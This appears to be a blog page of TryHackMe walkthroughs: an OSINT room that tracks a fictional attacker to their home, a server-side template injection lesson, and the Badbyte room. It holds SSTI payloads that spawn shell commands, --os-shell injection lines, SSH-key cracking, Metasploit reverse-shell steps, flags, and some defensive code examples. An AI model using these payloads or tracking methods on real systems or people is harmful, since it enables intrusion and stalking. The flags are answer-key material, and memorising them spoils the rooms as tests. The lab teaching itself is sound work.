  • OSINT Dojo’s Sakura Room walkthrough

     

    https://www.kumaratuljaiswal.in/



    Sakura Room


    Use a variety of OSINT techniques to solve this room created by the OSINT Dojo.




    Welcome to the OSINT Dojo’s Sakura Room!


    Task 2 TIP-OFF


    Background

    The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear to be any other significant indicators of compromise on any of our systems. However during forensic analysis our admins found an image left behind by the cybercriminals. Perhaps it contains some clues that could allow us to determine who the attackers were?


    We've copied the image left by the attacker, you can view it in your browser here.




    Instructions


    Images can contain a treasure trove of information, both on the surface as well as embedded within the file itself. You might find information such as when a photo was created, what software was used, author and copyright information, as well as other metadata significant to an investigation. In order to answer the following question, you will need to thoroughly analyze the image found by the OSINT Dojo administrators in order to obtain basic information on the attacker.

     

    Open the image link and press Ctrl+U to view its source.



     

     

     
    1) What username does the attacker go by?


    Ans :- SakuraSnowAngelAiko





    Task 3 RECONNAISSANCE

    
    Background

    It appears that our attacker made a fatal mistake in their operational security. They seem to have reused their username across other social media platforms as well. This should make it far easier for us to gather additional information on them by locating their other social media accounts.
    Instructions


    Most digital platforms have some sort of username field. Many people become attached to their usernames, and may therefore use it across a number of platforms, making it easy to find other accounts owned by the same person when the username is unique enough. This can be especially helpful on platforms such as on job hunting sites where a user is more likely to provide real information about themselves, such as their full name or location information.


    A quick search on a reputable search engine can help find matching usernames on other platforms, and there are also a large number of specialty tools that exist for that very same purpose. Keep in mind, that sometimes a platform will not show up in either the search engine results or in the specialized username searches due to false negatives. In some cases you need to manually check the site yourself to be 100% positive if the account exists or not. In order to answer the following questions, use the attacker's username found in Task 2 to expand the OSINT investigation onto other platforms in order to gather additional identifying information on the attacker. Be wary of any false positives!

     

    --> Go to GitHub and search for the username ‘SakuraSnowAngelAiko’
     

     


     

     

    --> Under that user you will find a PGP repo





     

    --> You can copy this key and decode it using base64:

    echo "public key" | base64 -d

    Public key Link here :- Click Here

     





     

     

    1) What is the full email address used by the attacker?

    Ans :- SakuraSnowAngel83@protonmail.com






    2) What is the attacker's full real name?


    Ans :- Aiko Abe
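
    The base64 step above works because a PGP public key stores its owner's User ID (name and email) as plain text inside the armored block. The following is an added example, not part of the original walkthrough, for checking what identity a key you publish would disclose; the sample key is constructed in the code and carries no real key material.

```python
import base64
from email.utils import parseaddr

USER_ID_TAG = 13  # OpenPGP packet tag for a User ID packet (RFC 4880)


def build_sample_armor(uid):
    """Constructed sample: dummy key packet + User ID packet, ASCII-armored."""
    key_body = bytes(12)  # placeholder bytes, not real key material
    key_pkt = bytes([0x99]) + len(key_body).to_bytes(2, "big") + key_body
    uid_raw = uid.encode("utf-8")
    uid_pkt = bytes([0xB4, len(uid_raw)]) + uid_raw  # old format, tag 13
    b64 = base64.b64encode(key_pkt + uid_pkt).decode("ascii")
    body = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join(
        ["-----BEGIN PGP PUBLIC KEY BLOCK-----", "Comment: constructed sample", ""]
        + body
        + ["=AAAA", "-----END PGP PUBLIC KEY BLOCK-----"]  # dummy checksum line
    )


def dearmor(armored):
    """Strip armor lines, headers and the checksum line, then base64-decode."""
    body, in_block, past_headers = [], False, False
    for line in armored.splitlines():
        line = line.strip()
        if line.startswith("-----BEGIN PGP"):
            in_block, past_headers = True, False
            continue
        if line.startswith("-----END PGP"):
            break
        if not in_block:
            continue
        if not past_headers:
            if line == "":
                past_headers = True
                continue
            if ": " in line:          # armor header such as "Comment: ..."
                continue
            past_headers = True       # tolerate a missing blank separator
        if line.startswith("="):      # CRC24 checksum line (not verified here)
            continue
        body.append(line)
    return base64.b64decode("".join(body))


def iter_packets(data):
    """Yield (tag, body) for each OpenPGP packet in a binary key."""
    i = 0
    while i < len(data):
        hdr = data[i]
        if not hdr & 0x80:
            raise ValueError("not a packet header at offset %d" % i)
        i += 1
        if hdr & 0x40:                # new-format header
            tag = hdr & 0x3F
            first = data[i]
            i += 1
            if first < 192:
                length = first
            elif first < 224:
                length = ((first - 192) << 8) + data[i] + 192
                i += 1
            elif first == 255:
                length = int.from_bytes(data[i:i + 4], "big")
                i += 4
            else:
                raise ValueError("partial body lengths are not handled")
        else:                         # old-format header
            tag = (hdr >> 2) & 0x0F
            length_type = hdr & 0x03
            if length_type == 3:      # indeterminate: body runs to the end
                length = len(data) - i
            else:
                n = 1 << length_type  # 1, 2 or 4 length octets
                length = int.from_bytes(data[i:i + n], "big")
                i += n
        if i + length > len(data):
            raise ValueError("truncated packet")
        yield tag, data[i:i + length]
        i += length


def disclosed_identities(armored):
    """Return (name, email) for every User ID packet in an armored key."""
    result = []
    for tag, body in iter_packets(dearmor(armored)):
        if tag == USER_ID_TAG:
            result.append(parseaddr(body.decode("utf-8", "replace")))
    return result


SAMPLE_KEY = build_sample_armor("Example User <user@example.org>")

if __name__ == "__main__":
    for name, email in disclosed_identities(SAMPLE_KEY):
        print("key discloses name=%r email=%r" % (name, email))
```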





    Task 4 UNVEIL


    Background

    It seems the cybercriminal is aware that we are on to them. As we were investigating into their Github account we observed indicators that the account owner had already begun editing and deleting information in order to throw us off their trail. It is likely that they were removing this information because it contained some sort of data that would add to our investigation. Perhaps there is a way to retrieve the original information that they provided?



    Instructions


    On some platforms, the edited or removed content may be unrecoverable unless the page was cached or archived on another platform. However, other platforms may possess built-in functionality to view the history of edits, deletions, or insertions. When available this audit history allows investigators to locate information that was once included, possibly by mistake or oversight, and then removed by the user. Such content is often quite valuable in the course of an investigation. In order to answer the below questions, you will need to perform a deeper dive into the attacker's Github account for any additional information that may have been altered or removed. You will then utilize this information to trace some of the attacker's cryptocurrency transactions.

     





    1) What cryptocurrency does the attacker own a cryptocurrency wallet for?

    Ans :- Ethereum



     

    --> Scroll down to the list of repos, where we can see there is an ETH repo


     

     

    --> Click on this repo
    --> Click on miningscript
    --> Click on history

     


     

     




     



     

    2) What is the attacker's cryptocurrency wallet address?

    Ans :- 0xa102397dbeeBeFD8cD2F73A89122fCdB53abB6ef


    3) What mining pool did the attacker receive payments from on January 23, 2021 UTC?

    Ans :- Ethermine



    4) What other cryptocurrency did the attacker exchange with using their cryptocurrency wallet?


    Ans :- Tether






    Task 5 Taunt


    Background

    Just as we thought, the cybercriminal is fully aware that we are gathering information about them after their attack. They were even so brazen as to message the OSINT Dojo on Twitter and taunt us for our efforts. The Twitter account which they used appears to use a different username than what we were previously tracking, maybe there is some additional information we can locate to get an idea of where they are heading to next?

    We've taken a screenshot of the message sent to us by the attacker, you can view it in your browser here.



    Instructions


    Although many users share their username across different platforms, it isn't uncommon for users to also have alternative accounts that they keep entirely separate, such as for investigations, trolling, or just as a way to separate their personal and public lives. These alternative accounts might contain information not seen in their other accounts, and should also be investigated thoroughly. In order to answer the following questions, you will need to view the screenshot of the message sent by the attacker to the OSINT Dojo on Twitter and use it to locate additional information on the attacker's Twitter account. You will then need to follow the leads from the Twitter account to the Dark Web and other platforms in order to discover additional information.

     

     




    1) What is the attacker's current Twitter handle?

    Ans :- SakuraLoverAiko

     

     

    HINT :- 

     

     

     



     

    --> Open Tor, search for "deep paste dark web" and go to this result - Deep web pastebin - Tor Links - onion Links (2021)

     

     

    --> Click on https://depastedihrn3jtw.onion - DeepPaste, a new extensive site..



     


    2) What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?

    Ans :- http://depastedihrn3jtw.onion/show.php?md5=0a5c6e136a98a60b8a21643ce8c15a74


     

    HINT :- wigle.net is a website where we can find wireless network data by location, name, etc. From the saved screenshot above we got the exact name of the WiFi network. You can go to wigle.net, register and log in, and then do an advanced search with the name of the WiFi network.
     

    3) What is the BSSID for the attacker's Home WiFi?

    Ans :- 84:af:ec:34:fc:f8






    Task 6 HOMEBOUND


    Background

    Based on their tweets, it appears our cybercriminal is indeed heading home as they claimed. Their Twitter account seems to have plenty of photos which should allow us to piece together their route back home. If we follow the trail of breadcrumbs they left behind, we should be able to track their movements from one location to the next back all the way to their final destination. Once we can identify their final stops, we can identify which law enforcement organization we should forward our findings to.



    Instructions


    In OSINT, there is oftentimes no "smoking gun" that points to a clear and definitive answer. Instead, an OSINT analyst must learn to synthesize multiple pieces of intelligence in order to make a conclusion of what is likely, unlikely, or possible. By leveraging all available data, an analyst can make more informed decisions and perhaps even minimize the size of data gaps. In order to answer the following questions, use the information collected from the attacker's Twitter account, as well as information obtained from previous parts of the investigation to track the attacker back to the place they call home.





     

     


     

     

    1) What airport is closest to the location the attacker shared a photo from prior to getting on their flight?

    Ans :- DCA


     



     

     

    2) What airport did the attacker have their last layover in?

    Ans :- HND

     

     




     

    3) What lake can be seen in the map shared by the attacker as they were on their final flight home?

    Ans :- Lake Inawashiro






    4) What city does the attacker likely consider "home"?

    Ans :- Hirosaki



    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


     


  • TryHackMe Learn Server Side Template Injection

     

    https://www.kumaratuljaiswal.in/

     

     


    What is Server Side Template Injection?


    Server Side Template Injection (SSTI) is a web exploit which takes advantage of an insecure implementation of a template engine.




    What is a template engine?


    A template engine allows you to create static template files which can be re-used in your application.

    What does that mean? Consider a page that stores information about a user, /profile/<user>. The code might look something like this in Python's Flask: 

     

     

     


    This code creates a template string, and concatenates the user input into it. This way, the content can be loaded dynamically for each user, while keeping a consistent page format.

    Note: Flask is the web framework, while Jinja2 is the template engine being used.


    How is SSTI exploitable?


    Consider the above code, specifically the template string. The variable user (which is user input) is concatenated directly into the template, rather than passed in as data. This means whatever is supplied as user input will be interpreted by the engine.

    Note: The template engines themselves aren't vulnerable; the vulnerability comes from an insecure implementation by the developer.



    What is the impact of SSTI?


    As the name suggests, SSTI is a server side exploit, rather than client side such as cross site scripting (XSS).

    This means that vulnerabilities are even more critical, because instead of an account on the website being hijacked (common use of XSS), the server instead gets hijacked.

     

    You can access the web server by navigating to https://tryhackme.com/room/learnssti

     

     

    SSTI Payload

    • {{ ''.__class__}}
    • {{ ''.__init__}}
    • {{ ''.__class__.__mro__[1].__subclasses__() }}
    • {{ ''.__class__.__mro__[1] }}
    • {{ ''.__class__.__mro__[1].__subclasses__()[401] }}
    • {{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
    • {{'7'*7}}
    • jake*' --os-shell
    • jake--level 5 -e jade
    • ti?user=InjectHere*&comment=A&link" --level 5 -e jade
    • ti?user=*&comment=supercomment&link"
    • page?name=John*' --os-shell

     

     

    Note: The endpoint / does not exist, and you will receive a 404 error.

     

     

    Task 2 Detection


    Finding an injection point

    The exploit must be inserted somewhere; this is called an injection point.

    There are a few places we can look within an application, such as the URL or an input box (make sure to check for hidden inputs).

    In this example, there is a page that stores information about a user: http://[IP]:5000/profile/<user>, which takes in user input.

    We can find the intended output by providing an expected name:

     

    http://10.10.243.183:5000/profile/jake

     


    Fuzzing


    Fuzzing is a technique to determine whether the server is vulnerable by sending multiple characters in the hope of interfering with the backend system.

    This can be done manually, or by an application such as BurpSuite's Intruder. However, for educational purposes, we will look at the manual process.

    Luckily for us, most template engines will use a similar character set for their "special functions" which makes it relatively quick to detect if it's vulnerable to SSTI.


    For example, the following characters are known to be used in quite a few template engines: ${{<%[%'"}}%.


    To manually fuzz all of these characters, send them one by one, each following the previous one.

    The fuzzing process looks as follows:



     




     

    Continue with this process until you either get an error, or some characters start disappearing from the output.


    1) What sequence of characters causes the application to throw an error?


    Ans :- {{
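
    The fuzzing described above leaves a recognisable trace on the server side. The following is an added example, not part of the original room or walkthrough, that flags the template delimiters from the fuzz string in web access logs; the log lines, the IP addresses and the log format are constructed for the example.

```python
import re
from urllib.parse import unquote

# Delimiters taken from the fuzz string ${{<%[%'"}}% and the Jinja2 syntax
DELIMITERS = ("${", "{{", "}}", "{%", "%}", "<%", "[%")
# Python attribute names used in the introspection payloads on this page
INTROSPECTION = re.compile(r"__(class|mro|subclasses|init)__")
# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log (documentation IP ranges, not real traffic)
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2021:10:00:01 +0000] "GET /profile/jake HTTP/1.1" 200 312
203.0.113.9 - - [10/Mar/2021:10:00:07 +0000] "GET /profile/%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25 HTTP/1.1" 500 290
203.0.113.9 - - [10/Mar/2021:10:00:09 +0000] "GET /profile/%7B%7B7*7%7D%7D HTTP/1.1" 200 305
203.0.113.9 - - [10/Mar/2021:10:00:15 +0000] "GET /profile/%7B%7B%20%27%27.__class__.__mro__%20%7D%7D HTTP/1.1" 200 400
203.0.113.9 - - [10/Mar/2021:10:00:21 +0000] "GET /profile/%257B%257B7*7%257D%257D HTTP/1.1" 200 305
198.51.100.2 - - [10/Mar/2021:10:01:00 +0000] "GET /search?q=100%25+cotton HTTP/1.1" 200 120
""".splitlines()


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target):
    """Return a finding dict for a request target, or None if it looks benign."""
    text = decode_fully(target)
    tokens = [d for d in DELIMITERS if d in text]
    if not tokens:
        return None
    level = "introspection" if INTROSPECTION.search(text) else "probe"
    return {"decoded": text, "tokens": tokens, "level": level}


def scan(lines):
    """Scan access-log lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, _method, target, status = match.groups()
        finding = classify(target)
        if finding:
            # A 5xx answer to a probe suggests the engine parsed the input
            finding.update(ip=ip, status=int(status),
                           server_error=int(status) >= 500)
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], f["level"], f["decoded"])
```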

     

     

     

    Task 3 Identification


    Now that we have detected what characters caused the application to error, it is time to identify what template engine is being used.

    In the best case scenario, the error message will include the template engine, which marks this step complete!

    However, if this is not the case, we can use a decision tree to help us identify the template engine:

     

     

     

    To follow the decision tree, start at the very left and include the variable in your request. Follow the arrow depending on the output:



    •     Green arrow - The expression evaluated (i.e 42)
    •     Red arrow - The expression is shown in the output (i.e ${7*7})

     

     

    In the case of our example, the process looks as follows:
     

     




    The application mirrors the user input, so we follow the red arrow:

     




    The application evaluates the user input, so we follow the green arrow.

    Continue with this process until you get to the end of the decision tree.


    1) What template engine is being used in this application?

    Ans :- Jinja2

     

     

     

    Task 4 Syntax


    After having identified the template engine, we now need to learn its syntax.

    Where better to learn than the official documentation?

    Always look for the following, no matter the language or template engine:



    •     How to start a print statement
    •     How to end a print statement
    •     How to start a block statement
    •     How to end a block statement

        

    In the case of our example, the documentation states the following:


    •     {{ - Used to mark the start of a print statement
    •     }} - Used to mark the end of a print statement
    •     {% - Used to mark the start of a block statement
    •     %} - Used to mark the end of a block statement



    1) How do you start a comment in Jinja2?

    Ans :- (#

     

     

    Task 5 Exploitation


    At this point, we know:

    •     The application is vulnerable to SSTI
    •     The injection point
    •     The template engine
    •     The template engine syntax




    Planning


    Let's first plan how we would like to exploit this vulnerability.

    Since Jinja2 is a Python based template engine, we will look at ways to run shell commands in Python. A quick Google search brings up a blog that details different ways to run shell commands.

    I will highlight a few of them below:

     

     


     

     

    Crafting a proof of concept (Generic)


    Combining all of this knowledge, we are able to build a proof of concept (POC).

    The following payload takes the syntax we acquired from Task 4, and the shells above, and merges them into something that the template engine will accept: http://[IP]:5000/profile/{% import os %}{{ os.system("whoami") }}.


    Note: Jinja2 is essentially a sub language of Python that doesn't integrate the import statement, which is why the above does not work.



    Crafting a proof of concept (Jinja2)

    Python allows us to call the current class instance with .__class__; we can call this on an empty string:

    Payload: http://10.10.243.183:5000/profile/{{ ''.__class__ }}.



    Classes in Python have an attribute called .__mro__ that allows us to climb up the inherited object tree:

    Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__ }}.



    Since we want the root object, we can access the second property (first index):

    Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1] }}.




    Objects in Python have a method called .__subclasses__ that allows us to climb down the object tree:

    Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__() }}.



    Now we need to find an object that allows us to run shell commands. Doing a Ctrl-F for the modules in the code above yields us a match:

     

     

     


     

    As this whole output is just a Python list, we can access this by using its index. You can find this by either trial and error, or by counting its position in the list.



    In this example, the position in the list is 400 (index 401):

    Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401] }}.




    The above payload essentially calls the subprocess.Popen method; now all we have to do is call it (use the code above for the syntax):

    Payload: http://10.10.243.183:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}.



    Finding payloads



    The process to build a payload takes a little while when doing it for the first time, however it is important to understand why it works.


    For quick reference, an amazing GitHub repo has been created as a cheatsheet for payloads for all web vulnerabilities, including SSTI.


    The repo is located here, while the document for SSTI is located here.
     

    1) What is the result of the "whoami" shell command?

    Ans:- jake

     

     

     

    Task 6 Examination


    Now that we've exploited the application, let's see what was actually happening when the payload was injected.


    The code that we exploited was the same as shown in Task 1:

     

     



    Let's imagine this like a simple find and replace.

    Refer to the image below to see exactly how this works:




     

    As we learned in Task 4, Jinja2 is going to evaluate code that is in-between those sets of characters, which is why the exploit worked.

     

     


    Task 7 Remediation


    All this hacking begs the question, what can be done to prevent this from happening in the first place?


    Sanitisation


    User input can not be trusted!

    Every place in your application where a user is allowed to add custom content, make sure the input is sanitised!

    This can be done by first planning what character set you want to allow, and add these to a whitelist.


    In Python, this can be done like so:

     

     


     

    Secure methods


    Most template engines will have a feature that allows you to pass input in as data, rather than concatenating input into the template.


    In Jinja2, this can be done by using the second argument:




     

    Most importantly, remember to read the documentation of the template engine you are using.
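
    The two remediation steps above, next to the insecure pattern from Task 6, as an added example that is not the room's or the author's code. It uses Jinja2 directly (the jinja2 package must be installed); the template text, the function names and the allow-list are assumptions made for the example.

```python
import re
from jinja2 import Environment, TemplateSyntaxError

env = Environment(autoescape=True)

# Allow-list: letters and digits only, 1 to 32 characters (example policy)
ALLOWED_USERNAME = re.compile(r"[A-Za-z0-9]{1,32}")


def render_vulnerable(user):
    """Insecure: user input is concatenated into the template source."""
    template = "<h1>Welcome to the profile of " + user + "!</h1>"
    return env.from_string(template).render()


def render_safe(user):
    """Secure: the template is fixed and user input is passed in as data."""
    template = "<h1>Welcome to the profile of {{ user }}!</h1>"
    return env.from_string(template).render(user=user)


def breaks_template(user):
    """True if the input makes the concatenated template fail to parse."""
    try:
        render_vulnerable(user)
    except TemplateSyntaxError:
        return True
    return False


def validate_username(user):
    """Reject anything outside the allow-list before it reaches a template."""
    if not ALLOWED_USERNAME.fullmatch(user):
        raise ValueError("username contains characters outside the allow-list")
    return user


def handle_profile(user):
    """Request handler sketch: validate first, then render with data passing."""
    try:
        user = validate_username(user)
    except ValueError:
        return 400, "invalid username"
    return 200, render_safe(user)


if __name__ == "__main__":
    probe = "{{ 7*7 }}"
    print("vulnerable:", render_vulnerable(probe))  # expression is evaluated
    print("safe      :", render_safe(probe))        # expression stays text
    print("handler   :", handle_profile(probe))     # rejected by allow-list
    print("handler   :", handle_profile("jake"))
```

    Passing input as data is the actual fix; the allow-list is a second layer that also stops the `{{` error seen in Task 2 from ever reaching the engine.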

     

     

    Task 8 Case Study


    HackerOne Bug Bounty


    In March 2016, a user reported an SSTI vulnerability in one of Uber's subdomains.

    The vulnerability was present within a form that allowed the user to change their profile name. Much like in the example, the user had control over an input which was then reflected back to the user (via email).


    Although the user was unable to gain remote code execution, the vulnerability was still present and they were awarded with a $10,000 bounty!


    Read the report here.


    1) What payload was used to confirm SSTI?

    Ans :- {{'7'*7}}

     

     

     



     

     

     

     

  • TryHackMe Badbyte Infiltrate BadByte and help us to take over root

     


     

    BadByte 


    Badbyte (https://tryhackme.com/room/badbyte) covers many important aspects of penetration testing, such as the importance of enumeration, hash cracking, port forwarding, web exploitation and privilege escalation. First of all, fire up your pen testing machine and connect to the TryHackMe network by OpenVPN. Then deploy the given machine.



    Reconnaissance


    First of all we have to perform a traditional port scan with nmap or rustscan; we will use nmap. With the following nmap scan, you can get the answers for all 4 questions.



    1) How many ports are open?

    Ans :- 2 ports are open.



    2) What service is running on the lowest open port?

    Ans :- Lowest port is 22. So, the service running there is SSH.

     

     


     



    3) What non-standard port is open?

    Ans :- Only non-standard port we can find is 30024.



    4) What service is running on the non-standard port?


    Ans :- FTP is running on that port instead of port 21.





    Foothold


    So, you know that there are FTP and SSH services running on the machine. Let us try to login to FTP as an anonymous user.



    Download note.txt



    We can log in to FTP as an anonymous user without specifying a password. When looking around we can see that there are two files named id_rsa and note.txt. Let us download those.



    1) What username do we find during the enumeration process?


    When looking at the note.txt, we can find out the username as “errorcauser”.

    Ans :- errorcauser








    John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.


    To crack the SSH private key, first use the ssh2john Python script to convert the private key to a hash (it comes with Kali Linux; run locate ssh2john).


    • python path/to/ssh2john.py privatekey > privatekey.hash



    Then use john to crack the hash.



    • john privatekey.hash -w=/path/to/wordlist



    Crack the passphrase of the private key and SSH into the machine. Make sure to change the file permissions of SSH private key to 600.



    2) What is the passphrase for the RSA private key?


    The id_rsa file we downloaded is an SSH private key. In order to use it with SSH, we need a passphrase. So, first we need to convert this key into a hash using ssh2john.

    Ans :- cupcake



    Now we have the hash of the SSH key, so we can crack it using John the Ripper.
     

     


     

    We can easily find the passphrase by cracking it with john’s default wordlist.




    Port Forwarding


    As we have the passphrase, we can log in to SSH using it. We have to set up dynamic port forwarding. However, when we try to log in, an error occurs, as follows.





    Remember to provide the above cracked hash as the passphrase. You will be able to easily login as Errorcauser.



    Then we have to set up proxychains for the dynamic port forwarding. So, go to the proxychains configuration file which is located at “/etc/proxychains.conf” of your pentesting machine and open it with Nano editor.

     




    Then, make necessary changes. (comment out socks4 127.0.0.1 9050 and add socks5 127.0.0.1 1337 to the end of configuration file)


    Then, run a port scan using nmap to enumerate internal ports on the server using proxychains.

     

     


     

     


    After some time, we are given output like the following.

     

     



    After finding the port of the webserver, perform Local Port Forwarding to that port (port 80) using SSH with the -L flag, as follows.







    Here, the remote port is 80 (which we found with the nmap scan) and the local port is given as 8080. Give the same passphrase we cracked earlier.


    1) What main TCP ports are listening on localhost?


    From the above result, we can see that apart from the ssh port, ports 80 and 3306 are also open.

    Ans :- 80, 3306


    2) What protocols are used for these ports?


    http and mysql services are running on those ports.


    Ans :- http, mysql



    Web Exploitation


    As port 80 is open, we find that there is a web application involved. Just give the IP:PORT combination in your web browser.






     
    1) What CMS is running on the machine?


    When analyzing the web application, we find that it is developed using WordPress.

    Ans :- wordpress





     

     

     

    2) Can you find any vulnerable plugins?

    You can use the WordPress enumeration nmap script to find the plugins.

    Ans :- No answer needed





    The enumeration above gives us output as follows.




    I just Googled the plugins for vulnerabilities and found the answers for the following questions.




    3) What is the CVE number for directory traversal vulnerability?

    Ans :- CVE-2020-11738





    4) What is the CVE number for remote code execution vulnerability?

    Ans :- CVE-2020-25213



    5) There is a Metasploit module for the exploit. You can use it to get the reverse shell.

    In msfconsole search for a relevant exploit. I found it easily as follows.





    You have to set rhost to 127.0.0.1, rport to 8080 and lhost to your tun0 IP, then run the exploit. If everything is fine, you will be given a meterpreter session.







    6) What is the name of user that was running CMS?

    Give the command “whoami” and you will be able to find the username.

    Ans :-  cth



    7) What is the user flag?


    In the user’s home directory, you can find the user flag.

    Ans :-  THM{227906201d17d9c45aa93d0122ea1af7}






    Privilege Escalation



    As for now, we have a low privileged shell. But, we need to escalate our privileges in order to obtain the root flag.




     

    1) What is the user’s old password?


    When browsing the file system for a little bit, you find that the log file /var/log/bash.log can be accessed by the user without requiring a password. Just “cat” the log file and you can find the password there.

    Ans :-  G00dP@$sw0rd2020


     

     
     
     
     

    Make the user a superuser. Then you may need to change some directories in order to get to root’s home.


    Then you can obtain the root flag as follows.




     


    2) What is the root flag?


    You have to guess the new password of the user in order to get the root flag. As we must use SSH, we need the new password. It is very easy to guess. (Hint: Old password was configured last year and now we are not in last year. Isn’t it?) After guessing the new password, we can SSH in as the new user.

    Ans :- THM{ad485b44f63393b6a9225974909da5fa}





     

